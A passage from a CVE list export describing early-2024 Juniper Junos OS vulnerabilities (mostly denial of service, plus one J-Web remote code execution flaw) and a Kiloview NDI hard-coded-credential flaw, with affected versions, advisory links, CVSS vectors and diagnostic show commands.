CVE 2024 21616 Candidate An Improper Validation of Syntactic Correctness of Input vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On all Junos OS MX Series and SRX Series platforms, when SIP ALG is enabled, and a specific SIP packet is received and processed, NAT IP allocation fails for genuine traffic, which causes Denial of Service (DoS). Continuous receipt of this specific SIP ALG packet will cause a sustained DoS condition. NAT IP usage can be monitored by running the following command. user@srx> show security nat resource-usage source-pool <source_pool_name> Pool name: source_pool_name .. Address Factor-index Port-range Used Avail Total Usage X.X.X.X 0 Single Ports 50258 52342 62464 96% <<<<< - Alg Ports 0 2048 2048 0% This issue affects: Juniper Networks Junos OS on MX Series and SRX Series * All versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2. MISC:https://supportportal.juniper.net/JSA75757 | URL:https://supportportal.juniper.net/JSA75757 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21614 Candidate An Improper Check for Unusual or Exceptional Conditions vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based, unauthenticated attacker to cause rpd to crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when NETCONF and gRPC are enabled, and a specific query is executed via Dynamic Rendering (DREND), rpd will crash and restart. Continuous execution of this specific query will cause a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS * 22.2 versions earlier than 22.2R2-S2, 22.2R3; * 22.3 versions earlier than 22.3R2, 22.3R3. Juniper Networks Junos OS Evolved * 22.2 versions earlier than 22.2R2-S2-EVO, 22.2R3-EVO; * 22.3 versions earlier than 22.3R2-EVO, 22.3R3-EVO. This issue does not affect Juniper Networks: Junos OS versions earlier than 22.2R1; Junos OS Evolved versions earlier than 22.2R1-EVO. MISC:https://supportportal.juniper.net/JSA75755 | URL:https://supportportal.juniper.net/JSA75755 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21613 Candidate A Missing Release of Memory after Effective Lifetime vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause an rpd crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when traffic engineering is enabled for OSPF or ISIS, and a link flaps, a patroot memory leak is observed. This memory leak, over time, will lead to an rpd crash and restart. The memory usage can be monitored using the below command. user@host> show task memory detail | match patroot This issue affects: Juniper Networks Junos OS * All versions earlier than 21.2R3-S3; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-EVO; * 22.1 versions earlier than 22.1R3-EVO; * 22.2 versions earlier than 22.2R3-EVO. MISC:https://supportportal.juniper.net/JSA75754 | URL:https://supportportal.juniper.net/JSA75754 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21612 Candidate An Improper Handling of Syntactically Invalid Structure vulnerability in Object Flooding Protocol (OFP) service of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On all Junos OS Evolved platforms, when specific TCP packets are received on an open OFP port, the OFP crashes leading to a restart of Routine Engine (RE). Continuous receipt of these specific TCP packets will lead to a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS Evolved * All versions earlier than 21.2R3-S7-EVO; * 21.3 versions earlier than 21.3R3-S5-EVO ; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO ; * 22.3 versions earlier than 22.3R3-EVO; * 22.4 versions earlier than 22.4R2-EVO, 22.4R3-EVO. MISC:https://supportportal.juniper.net/JSA75753 | URL:https://supportportal.juniper.net/JSA75753 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21611 Candidate A Missing Release of Memory after Effective Lifetime vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). In a Juniper Flow Monitoring (jflow) scenario route churn that causes BGP next hops to be updated will cause a slow memory leak and eventually a crash and restart of rpd. Thread level memory utilization for the areas where the leak occurs can be checked using the below command: user@host> show task memory detail | match so_in so_in6 28 32 344450 11022400 344760 11032320 so_in 8 16 1841629 29466064 1841734 29467744 This issue affects: Junos OS * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Junos OS Evolved * 21.4-EVO versions earlier than 21.4R3-EVO; * 22.1-EVO versions earlier than 22.1R3-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO. This issue does not affect: Juniper Networks Junos OS versions earlier than 21.4R1. Juniper Networks Junos OS Evolved versions earlier than 21.4R1. MISC:https://supportportal.juniper.net/JSA75752 | URL:https://supportportal.juniper.net/JSA75752 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 2161 Candidate Use of Hard-coded Credentials in Kiloview NDI allows un-authenticated users to bypass authenticationThis issue affects Kiloview NDI N3, N3-s, N4, N20, N30, N40 and was fixed in Firmware version 2.02.0227 . MISC:https://www.kiloview.com/en/support/download/1779/ | URL:https://www.kiloview.com/en/support/download/1779/ | MISC:https://www.kiloview.com/en/support/download/n20-firmware-download/ | URL:https://www.kiloview.com/en/support/download/n20-firmware-download/ | MISC:https://www.kiloview.com/en/support/download/n3-for-ndi/ | URL:https://www.kiloview.com/en/support/download/n3-for-ndi/ | MISC:https://www.kiloview.com/en/support/download/n3-s-firmware-download/ | URL:https://www.kiloview.com/en/support/download/n3-s-firmware-download/ | MISC:https://www.kiloview.com/en/support/download/n30-for-ndi/ | URL:https://www.kiloview.com/en/support/download/n30-for-ndi/ | MISC:https://www.kiloview.com/en/support/download/n40/ | URL:https://www.kiloview.com/en/support/download/n40/ Assigned (20240304)
CVE 2024 21607 Candidate An Unsupported Feature in the UI vulnerability in Juniper Networks Junos OS on MX Series and EX9200 Series allows an unauthenticated, network-based attacker to cause partial impact to the integrity of the device. If the "tcp-reset" option is added to the "reject" action in an IPv6 filter which matches on "payload-protocol", packets are permitted instead of rejected. This happens because the payload-protocol match criteria is not supported in the kernel filter causing it to accept all packets without taking any other action. As a fix the payload-protocol match will be treated the same as a "next-header" match to avoid this filter bypass. This issue doesn't affect IPv4 firewall filters. This issue affects Juniper Networks Junos OS on MX Series and EX9200 Series: * All versions earlier than 20.4R3-S7; * 21.1 versions earlier than 21.1R3-S5; * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2-S2, 22.4R3. MISC:https://supportportal.juniper.net/JSA75748 | URL:https://supportportal.juniper.net/JSA75748 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21606 Candidate A Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). In a remote access VPN scenario, if a "tcp-encap-profile" is configured and a sequence of specific packets is received, a flowd crash and restart will be observed. This issue affects Juniper Networks Junos OS on SRX Series: * All versions earlier than 20.4R3-S8; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3. MISC:https://supportportal.juniper.net/JSA75747 | URL:https://supportportal.juniper.net/JSA75747 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H Assigned (20231227)
CVE 2024 21604 Candidate An Allocation of Resources Without Limits or Throttling vulnerability in the kernel of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a high rate of specific valid packets are processed by the routing engine (RE) this will lead to a loss of connectivity of the RE with other components of the chassis and thereby a complete and persistent system outage. Please note that a carefully designed lo0 firewall filter will block or limit these packets which should prevent this issue from occurring. The following log messages can be seen when this issue occurs: <host> kernel: nf_conntrack: nf_conntrack: table full, dropping packet This issue affects Juniper Networks Junos OS Evolved: * All versions earlier than 20.4R3-S7-EVO; * 21.2R1-EVO and later versions; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S2-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO; * 22.4-EVO versions earlier than 22.4R2-EVO. MISC:https://supportportal.juniper.net/JSA75745 | URL:https://supportportal.juniper.net/JSA75745 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21603 Candidate An Improper Check for Unusual or Exceptional Conditions vulnerability in the kernel of Juniper Network Junos OS on MX Series allows a network based attacker with low privileges to cause a denial of service. If a scaled configuration for Source class usage (SCU) / destination class usage (DCU) (more than 10 route classes) is present and the SCU/DCU statistics are gathered by executing specific SNMP requests or CLI commands, a 'vmcore' for the RE kernel will be seen which leads to a device restart. Continued exploitation of this issue will lead to a sustained DoS. This issue only affects MX Series devices with MPC10, MPC11 or LC9600, and MX304. No other MX Series devices are affected. This issue affects Juniper Networks Junos OS: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R2; * 22.3 versions earlier than 22.3R2. MISC:https://supportportal.juniper.net/JSA75744 | URL:https://supportportal.juniper.net/JSA75744 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21602 Candidate A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a specific IPv4 UDP packet is received and sent to the Routing Engine (RE) packetio crashes and restarts which causes a momentary traffic interruption. Continued receipt of such packets will lead to a sustained DoS. This issue does not happen with IPv6 packets. This issue affects Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L: * 21.4-EVO versions earlier than 21.4R3-S6-EVO; * 22.1-EVO versions earlier than 22.1R3-S5-EVO; * 22.2-EVO versions earlier than 22.2R2-S1-EVO, 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions earlier than 21.4R1-EVO. MISC:https://supportportal.juniper.net/JSA75743 | URL:https://supportportal.juniper.net/JSA75743 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21601 Candidate A Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in the Flow-processing Daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (Dos). On SRX Series devices when two different threads try to simultaneously process a queue which is used for TCP events flowd will crash. One of these threads can not be triggered externally, so the exploitation of this race condition is outside the attackers direct control. Continued exploitation of this issue will lead to a sustained DoS. This issue affects Juniper Networks Junos OS: * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2-S1, 22.4R3. This issue does not affect Juniper Networks Junos OS versions earlier than 21.2R1. MISC:https://supportportal.juniper.net/JSA75742 | URL:https://supportportal.juniper.net/JSA75742 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21600 Candidate An Improper Neutralization of Equivalent Special Elements vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on PTX Series allows a unauthenticated, adjacent attacker to cause a Denial of Service (DoS). When MPLS packets are meant to be sent to a flexible tunnel interface (FTI) and if the FTI tunnel is down, these will hit the reject NH, due to which the packets get sent to the CPU and cause a host path wedge condition. This will cause the FPC to hang and requires a manual restart to recover. Please note that this issue specifically affects PTX1000, PTX3000, PTX5000 with FPC3, PTX10002-60C, and PTX10008/16 with LC110x. Other PTX Series devices and Line Cards (LC) are not affected. The following log message can be seen when the issue occurs: Cmerror Op Set: Host Loopback: HOST LOOPBACK WEDGE DETECTED IN PATH ID <id> (URI: /fpc/<fpc>/pfe/<pfe>/cm/<cm>/Host_Loopback/<cm>/HOST_LOOPBACK_MAKE_CMERROR_ID[<id>]) This issue affects Juniper Networks Junos OS: * All versions earlier than 20.4R3-S8; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R2-S2, 22.1R3; * 22.2 versions earlier than 22.2R2-S1, 22.2R3. MISC:https://supportportal.juniper.net/JSA75741 | URL:https://supportportal.juniper.net/JSA75741 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21599 Candidate A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If an MX Series device receives PTP packets on an MPC3E that doesn't support PTP this causes a memory leak which will result in unpredictable behavior and ultimately in an MPC crash and restart. To monitor for this issue, please use the following FPC vty level commands: show heap shows an increase in "LAN buffer" utilization and show clksync ptp nbr-upd-info shows non-zero "Pending PFEs" counter. This issue affects Juniper Networks Junos OS on MX Series with MPC3E: * All versions earlier than 20.4R3-S3; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3; * 21.3 versions earlier than 21.3R2-S1, 21.3R3; * 21.4 versions earlier than 21.4R2; * 22.1 versions earlier than 22.1R2. MISC:https://supportportal.juniper.net/JSA75740 | URL:https://supportportal.juniper.net/JSA75740 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21597 Candidate An Exposure of Resource to Wrong Sphere vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the intended access restrictions. In an Abstracted Fabric (AF) scenario if routing-instances (RI) are configured, specific valid traffic destined to the device can bypass the configured lo0 firewall filters as it's received in the wrong RI context. This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2. MISC:https://supportportal.juniper.net/JSA75738 | URL:https://supportportal.juniper.net/JSA75738 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21596 Candidate A Heap-based Buffer Overflow vulnerability in the Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network based attacker to cause a Denial of Service (DoS). If an attacker sends a specific BGP UPDATE message to the device, this will cause a memory overwrite and therefore an RPD crash and restart in the backup Routing Engine (RE). Continued receipt of these packets will cause a sustained Denial of Service (DoS) condition in the backup RE. The primary RE is not impacted by this issue and there is no impact on traffic. This issue only affects devices with NSR enabled. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. This issue requires an attacker to have an established BGP session to a system affected by the issue. This issue affects both eBGP and iBGP implementations. This issue affects: Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.1 versions earlier than 23.1R2; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S4-EVO; * 22.2-EVO versions earlier than 22.2R3-S2-EVO; * 22.3-EVO versions later than 22.3R1-EVO; * 22.4-EVO versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.1-EVO versions earlier than 23.1R2-EVO; * 23.2-EVO versions earlier than 23.2R1-S2-EVO, 23.2R2-EVO. MISC:https://supportportal.juniper.net/JSA75735 | URL:https://supportportal.juniper.net/JSA75735 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21595 Candidate An Improper Validation of Syntactic Correctness of Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). If an attacker sends high rate of specific ICMP traffic to a device with VXLAN configured, this causes a deadlock of the PFE and results in the device becoming unresponsive. A manual restart will be required to recover the device. This issue only affects EX4100, EX4400, EX4600, QFX5000 Series devices. This issue affects: Juniper Networks Junos OS * 21.4R3 versions earlier than 21.4R3-S4; * 22.1R3 versions earlier than 22.1R3-S3; * 22.2R2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2; * 23.1 versions earlier than 23.1R2. MISC:https://advisory.juniper.net/JSA75734 | URL:https://advisory.juniper.net/JSA75734 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21594 Candidate A Heap-based Buffer Overflow vulnerability in the Network Services Daemon (NSD) of Juniper Networks Junos OS allows authenticated, low privileged, local attacker to cause a Denial of Service (DoS). On an SRX 5000 Series device, when executing a specific command repeatedly, memory is corrupted, which leads to a Flow Processing Daemon (flowd) crash. The NSD process has to be restarted to restore services. If this issue occurs, it can be checked with the following command: user@host> request security policies check The following log message can also be observed: Error: policies are out of sync for PFE node<number>.fpc<number>.pic<number>. This issue affects: Juniper Networks Junos OS on SRX 5000 Series * All versions earlier than 20.4R3-S6; * 21.1 versions earlier than 21.1R3-S5; * 21.2 versions earlier than 21.2R3-S4; * 21.3 versions earlier than 21.3R3-S3; * 21.4 versions earlier than 21.4R3-S3; * 22.1 versions earlier than 22.1R3-S1; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2. MISC:https://supportportal.juniper.net/JSA75733 | URL:https://supportportal.juniper.net/JSA75733 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21591 Candidate An Out-of-bounds Write vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS), or Remote Code Execution (RCE) and obtain root privileges on the device. This issue is caused by use of an insecure function allowing an attacker to overwrite arbitrary memory. This issue affects Juniper Networks Junos OS SRX Series and EX Series: * Junos OS versions earlier than 20.4R3-S9; * Junos OS 21.2 versions earlier than 21.2R3-S7; * Junos OS 21.3 versions earlier than 21.3R3-S5; * Junos OS 21.4 versions earlier than 21.4R3-S5; * Junos OS 22.1 versions earlier than 22.1R3-S4; * Junos OS 22.2 versions earlier than 22.2R3-S3; * Junos OS 22.3 versions earlier than 22.3R3-S2; * Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3. MISC:https://curesec.com/blog/article/CVE-2024-21591_Juniper_Remote_Code_Exec.html | URL:https://curesec.com/blog/article/CVE-2024-21591_Juniper_Remote_Code_Exec.html | MISC:https://supportportal.juniper.net/JSA75729 | URL:https://supportportal.juniper.net/JSA75729 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21589 Candidate An Improper Access Control vulnerability in the Juniper Networks Paragon Active Assurance Control Center allows an unauthenticated network-based attacker to access reports without authenticating, potentially containing sensitive configuration information. A feature was introduced in version 3.1.0 of the Paragon Active Assurance Control Center which allows users to selectively share account data. By exploiting this vulnerability, it is possible to access reports without being logged in, resulting in the opportunity for malicious exfiltration of user data. Note that the Paragon Active Assurance Control Center SaaS offering is not affected by this issue. This issue affects Juniper Networks Paragon Active Assurance versions 3.1.0, 3.2.0, 3.2.2, 3.3.0, 3.3.1, 3.4.0. This issue does not affect Juniper Networks Paragon Active Assurance versions earlier than 3.1.0. MISC:https://supportportal.juniper.net/JSA75727 | URL:https://supportportal.juniper.net/JSA75727 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N Assigned (20231227)
CVE 2024 21587 Candidate An Improper Handling of Exceptional Conditions vulnerability in the broadband edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an attacker directly connected to the vulnerable system who repeatedly flaps DHCP subscriber sessions to cause a slow memory leak, ultimately leading to a Denial of Service (DoS). Memory can only be recovered by manually restarting bbe-smgd. This issue only occurs if BFD liveness detection for DHCP subscribers is enabled. Systems without BFD liveness detection enabled are not vulnerable to this issue. Indication of the issue can be observed by periodically executing the 'show system processes extensive' command, which will indicate an increase in memory allocation for bbe-smgd. A small amount of memory is leaked every time a DHCP subscriber logs in, which will become visible over time, ultimately leading to memory starvation. user@junos> show system processes extensive | match bbe-smgd 13071 root 24 0 415M 201M select 0 0:41 7.28% bbe-smgd{bbe-smgd} 13071 root 20 0 415M 201M select 1 0:04 0.00% bbe-smgd{bbe-smgd} ... user@junos> show system processes extensive | match bbe-smgd 13071 root 20 0 420M 208M select 0 4:33 0.10% bbe-smgd{bbe-smgd} 13071 root 20 0 420M 208M select 0 0:12 0.00% bbe-smgd{bbe-smgd} ... This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2. MISC:https://supportportal.juniper.net/JSA75725 | URL:https://supportportal.juniper.net/JSA75725 | MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L | URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L Assigned (20231227)
CVE 2024 21585 Candidate An Improper Handling of Exceptional Conditions vulnerability in BGP session processing of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker, using specific timing outside the attacker's control, to flap BGP sessions and cause the routing protocol daemon (rpd) process to crash and restart, leading to a Denial of Service (DoS) condition. Continued BGP session flapping will create a sustained Denial of Service (DoS) condition. This issue only affects routers configured with non-stop routing (NSR) enabled. Graceful Restart (GR) helper mode, enabled by default, is also required for this issue to be exploitable. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. When the BGP session flaps on the NSR-enabled router, the device enters GR-helper/LLGR-helper mode due to the peer having negotiated GR/LLGR-restarter capability and the backup BGP requests for replication of the GR/LLGR-helper session, master BGP schedules, and initiates replication of GR/LLGR stale routes to the backup BGP. In this state, if the BGP session with the BGP peer comes up again, unsolicited replication is initiated for the peer without cleaning up the ongoing GR/LLGR-helper mode replication. This parallel two instances of replication for the same peer leads to the assert if the BGP session flaps again. This issue affects: Juniper Networks Junos 